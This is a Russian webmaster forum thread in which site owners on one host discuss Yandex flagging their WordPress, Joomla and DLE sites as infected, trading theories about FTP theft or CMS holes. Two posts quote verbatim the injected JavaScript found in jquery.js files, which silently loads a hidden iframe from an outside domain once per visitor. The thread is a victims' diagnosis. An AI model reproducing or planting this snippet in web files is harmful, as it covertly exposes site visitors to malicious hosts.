Яндекс нашел вирус на сайте

M
На сайте с 14.08.2012
Offline
51
#31
medik777:
Вообщем, я ухожу от этого хостера, завтра буду бэкапы на новый ставить. Думаю всё норм будет.

Мне кажется сменой хостера проблема не решится, у меня другой хостер и та же проблема. Скорее всего дырка в движке.

[Удален]
#32
Maksiim:
Мне кажется сменой хостера проблема не решится, у меня другой хостер и та же проблема. Скорее всего дырка в движке.

У меня тоже хостер другой, вредоносный код тот-же. Грешу на угон фтп пароля.

medik777
На сайте с 29.07.2012
Offline
15
#33

Решиться, ну по крайней мере пренесу некоторы проекты, надёжнее будет так.

TF-Studio
На сайте с 17.08.2010
Offline
334
#34

Хостер скорее всего не при чем, совершенно.

FTP / дыра на сайте / взлом админки.

Всё ещё лучший способ заработка для белых сайтов: GoGetLinks (https://www.gogetlinks.net/?inv=fahbn8).
medik777
На сайте с 29.07.2012
Offline
15
#35

TF-Studio дело может быть не совсем в хостинге, а именно, у меня панель управления файлами(директ-админ), возможно ещё обновили, и туда како йнить код влился, или php-my-admin, там куча сервисных скриптов на хостинге, и так же на других хостингах - похалатничали, а теперь мы страдаем, вот и все дела. И не в сайтах дело, потому что у меня в админке, есть проверка на взлом, если взломают сайт сразу закрываеться, тоесть никто кроме меня туда не залазил. дело 100% в хостинге.

---------- Добавлено 08.08.2013 в 16:28 ----------

Я потом отпишусь, после переезда.

MALCHUN
На сайте с 01.05.2009
Offline
71
#36

Пока четыре сайта заражены все на хостлайф DLE, wordpress на каждом подгружается разная хрень на wordpress в файле /wp-includes/js/jquery/jquery.js прописано

;var if98B3EY = document.createElement('iframe');if98B3EY.name = 'if98B3EY';if98B3EY.src = 'http://utro.infonev.com/';if98B3EY.style.width = '0px';if98B3EY.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if98B3EY=') == -1) { document.getElementsByTagName('body')[0].appendChild(if98B3EY); document.cookie = 'if98B3EY=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};

Хостинг может и не причем, но именно на этом хостинге взламывают второй раз, тот сайт в который вписан выше указанный код я перенес туда 18 июля работает на WordPress 3.5.2. установлены 10 плагинов

png pla.png
Хуже ссылочной биржи (http://www.linkfeed.ru/reg/59860) Я не видел :)
secline
На сайте с 25.10.2012
Offline
18
#37

После последнего взлома сайта, а именно был подгружен новый файл media/joomgallery/js/thickbox3/js/jquery-latest.pack.js

Восстановился по бекапу, сменил все пароли, удалил лишние плагины и темы.

А сегодня опять появился новый файл

public_html/templates/theme/jquery.js

var if2L4lY8 = document.createElement('iframe');if2L4lY8.name = 'if2L4lY8';if2L4lY8.src = 'http://powen.jm9.com/';if2L4lY8.style.width = '0px';if2L4lY8.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if2L4lY8=') == -1) { document.getElementsByTagName('body')[0].appendChild(if2L4lY8);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'if2L4lY8=yes; path=/; expires=' + expiresDate;}};

Самое что обидное дата изменения файла не изменяется. Искал информацию за последнюю неделю по файлам jquery.js, попался только этот топик.

Хостинг все тот же хостлайф, германия.

NM
На сайте с 18.02.2011
Offline
184
#38

С саппортом хостлайфа кто-нибудь общался по этой проблеме?

Они за собой ничего не признают?

https://clck.ru/37jxNm пытаюсь здесь отбить просадку в РСЯ Распродажа сайтов https://docs.google.com/spreadsheets/d/1m63GJQUZMrrhTxT2aoAQBX_722Kte2PfvTQEON_SgGE/
secline
На сайте с 25.10.2012
Offline
18
#39

Сказали что у них все хорошо, уже какой день общаемся. Во всем винят что популярные CMS взламываются, посоветовали права папок изменить и все.

R8
На сайте с 15.08.2013
Offline
0
#40

Этот же хостинг, та же проблема.

У меня на всех джумлах была зараза в файлах /media/system/js/caption.js

Сначала дата изменения не менялась, последний раз изенилась у всех на 10 августа. несколько сайтов не чистил, наблюдал.

Похоже схема работы сканирует общедоступный сайт на предмет подключенных js. т.к. на сайтах на yii фрейворке заражены файлы с произвольными названиями. поэтому первым делом нужно проверить подключенные скрипты.

удалял уже раз пять, пароль на фтп поменял. Вроде не помогло.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий